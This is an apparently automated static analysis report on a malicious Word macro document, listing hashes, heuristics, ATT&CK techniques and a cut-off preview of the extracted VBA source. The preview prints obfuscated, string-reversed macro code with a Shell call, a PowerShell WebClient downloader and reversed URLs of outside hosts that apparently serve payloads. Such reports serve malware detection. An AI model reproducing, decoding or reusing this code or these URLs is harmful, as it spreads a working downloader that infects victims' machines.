Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352db6e3d588f3d3…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 173.5 KB
Created: 2018-05-08 05:47:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16

MD5: 2ba8c60e9063cf18123f118b435c843e
SHA-1: eea32233b10d9860347df68d7e08aa977e94de8d
SHA-256: 352db6e3d588f3d341b60f3d09fc5a18ddf2694d05703744ef0bf19403e3d4dd

Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an OLE document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The script contains a call to the 'Shell' function, which is highly suspicious and likely used to download and execute a secondary payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.

Heuristics (5)

  • [high] OLE_SLACK_ANOMALY: OLE document has large unaccounted-for region
    OLE file is 177,664 bytes but its declared streams total only 36,034 bytes — 141,630 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • [medium] OLE_VBA_MACROS: VBA macros detected (1 related finding)
    Document contains VBA macro code.
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 41612 bytes
    SHA-256: e8e4a9ab77a4928fbc8cb5fba0e29ed3088aa229796744bc84559b8ab1632d5b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "baYpFlDs"
Sub Enqpod(FzTjbn)
Dim IJmlRR, XkEWEY
nzoit = 15996 = DBpXj
wVPtj = sPfSzm - CStr(51966) + jCmSkE - Tan(83101) - 34045 / 94758 / (60083 - CBool(8680) * 65327 / hFIzOk)
Dim kCVKp, jkHhp
SNUAOX = 75954 = UjYkpz
LKXVl = VKijc - CStr(55188) + YGJQq - Tan(24337) - 28895 / 34161 / (23558 - CBool(7956) * 88570 / aJlEil)
End Sub
Sub qoWIzJRHICjmBE(MFqQwMiDfXJM As String)
On Error Resume Next
Dim qHVak, EpzDq
muTDN = 43258 = tckrw
dvKsk = AvHlM - CStr(6951) + ZElWRO - Tan(41704) - 69474 / 15421 / (60642 - CBool(13773) * 11529 / hWrsG)
Dim WTHQt, NzqYiI
zhzDH = 11114 = cdWVP
mMXiD = fwhMS - CStr(77662) + ZERfLd - Tan(44265) - 99659 / 12665 / (81123 - CBool(70850) * 35709 / montwm)
[Shell] qKAZM + Chr(vbKeyC) + MFqQwMiDfXJM + QdLSUfPP + OLzKssDjWnL, lCrHA + 0 + lCrHA
Dim brIoQ, oBPDrT
MtooVF = 6694 = GZcvm
HndimA = pmDdE - CStr(98604) + OQLTiT - Tan(60557) - 98407 / 28354 / (84281 - CBool(1052) * 63902 / AURfs)
Dim ljNlYF, qXHlK
GcEqO = 18382 = SOIYl
FszUVX = aNuBim - CStr(26379) + cIrdh - Tan(67507) - 51323 / 60895 / (91889 - CBool(57925) * 5293 / bLWYo)
End Sub

Attribute VB_Name = "zTtDuoJT"
Sub JQsAi(XOzin)
Dim psowL, kBWctl
pabIK = 79400 = mfHkEK
ufEcQp = JbEGiD - CStr(47109) + whWHt - Tan(79979) - 66056 / 91307 / (12315 - CBool(78591) * 87359 / XJkEs)
End Sub
Function zDiNvbRjd()
On Error Resume Next
Dim DpVSz, vHfwWB
lHUjaO = 93590 = rMkwn
hbzqA = hziwd - CStr(65015) + MmJjYE - Tan(24517) - 15010 / 99554 / (5495 - CBool(50562) * 19937 / vkMdlU)
Dim pcjzI, fEmHln
XiXFJ = 34711 = VQWXUG
zJDiX = NvSuv - CStr(14860) + QNJops - Tan(20847) - 88920 / 85011 / (87817 - CBool(90502) * 39710 / wrYGI)
jFMZDj = JWzoLF("YTP9'+' + ci'+'l'+'b'+'up:vne2vD = '+'CD'+'S'+'2'+'vD;)o'+'Z9'+'@oZ9(t'+'ilpS.oZ9sE3D8", 78392 - 78392 + 6 + 78392 - 78392, 78392 - 78392 + 78 + 78392 - 78392)
Dim BVjuiY, UzcQd
BiOIH = 65675 = cviHQI
FUVWM = SGRkSb - CStr(30398) + XNRbQl - Tan(36859) - 75637 / 69476 / (67952 - CBool(34272) * 45874 / AFrZda)
Dim XrdsSi, XcvRKz
cGwKGq = 45844 = nnsHsk
ailCb = zmwihu - CStr(99211) + rAqjX - Tan(18190) - 52656 / 110 / (80148 - CBool(2921) * 70452 / uEpAL)
WPUKOTCs = JWzoLF("o1OT6+'UYY2vD;modn'+'ar '+')o'+'Z9to'+'Z'+'9+oZ9c'+'ejbo'+'-woZ9+oZ9eo'+'Z'+'9+oZ9'+'no'+'Z9(& = dsad'+'asn2v'+'D'((iq", 20244 - 20244 + 3 + 20244 - 20244, 20244 - 20244 + 111 + 20244 - 20244)
Dim DLCQjH, wdUAb
wYKvn = 4613 = Ualapj
Xwuww = rroQb - CStr(37995) + KajGzN - Tan(54045) - 77832 / 60626 / (68995 - CBool(17217) * 5019 / kVcZbb)
Dim zKURu, ToAjiE
BEqqht = 51309 = VlEQJl
VhcQKK = TkARJB - CStr(33534) + QrzZu - Tan(82935) - 78408 / 52892 / (61727 - CBool(2544) * 41913 / bYQBlv)
LDItjYhVE = JWzoLF("BjMOc:Vne$ (.|)29]rAHC[,)67]rAHC[+08]rAHC[+MuUdkQ6", 94564 - 94564 + 8 + 94564 - 94564, 94564 - 94564 + 41 + 94564 - 94564)
Dim STERu, CkFqPj
SBVMQ = 68824 = IjFvPo
XuUzj = hwALa - CStr(9041) + rGjlQR - Tan(93637) - 43399 / 49923 / (5876 - CBool(7354) * 70926 / ELmNI)
Dim wZzzpU, NXuZU
TiRdSb = 68558 = vJkCLw
WpSiB = PIzVmj - CStr(15277) + kUiui - Tan(84766) - 15443 / 39383 / (42389 - CBool(13959) * 44173 / BBQOw)
cRzbYJth = JWzoLF("cC68e'+'ilCbeW'+'.'+'t'+'eN.'+'m'+'etsy'+'S )oZ'+'9'+'tce'+'jbo-oZ9+oZ9'1R", 3809 - 3809 + 3 + 3809 - 3809, 3809 - 3809 + 68 + 3809 - 3809)
Dim Wlqhbv, GDVSI
rbcKoB = 16414 = FKCTLH
aOskYI = WRCtn - CStr(54360) + omCOb - Tan(59625) - 82173 / 48179 / (82361 - CBool(53672) * 24118 / zQaoOP)
Dim Hoojad, wtpfz
DQjvLh = 86094 = biORj
bjmHi = jioddj - CStr(39080) + mQtpRa - Tan(66706) - 96616 / 73163 / (38979 - CBool(39892) * 87168 / KfKaSq)
uHHaFhmZNcV = JWzoLF("MU50aB'+'u/m'+'oc.onikab//'+':'+'ptth@/XxYS'+'/su'+'.'+'ne'+'gac'+'//:ptth@/S'+'gaHG'+'0/mo'+'c'+'.puorg'+'icapra//:ptth@/hGXvYB/ku.'+'oc.ygol'+'o'+'nhc'+'et-'+'tna'+'rel'c", 76430 - 76430 + 2 + 76430 - 76430, 76430 - 76430 + 166 + 76430 - 76430)
Dim tQGhw, FVbDRb
CfKkY = 42 = mduSn
NYCiCL = LzVKMs - CStr(34414) + NWiCs - Tan(62571) - 70471 / 61135 / (41406 - CBool(48685) * 4005 / jWQVo)
Dim fTkdwV, EiJUs
qzSmW = 99239 = ifjnT
Nrvbh = SddEPV - CStr(24645) + anXCC - Tan(369
... (truncated)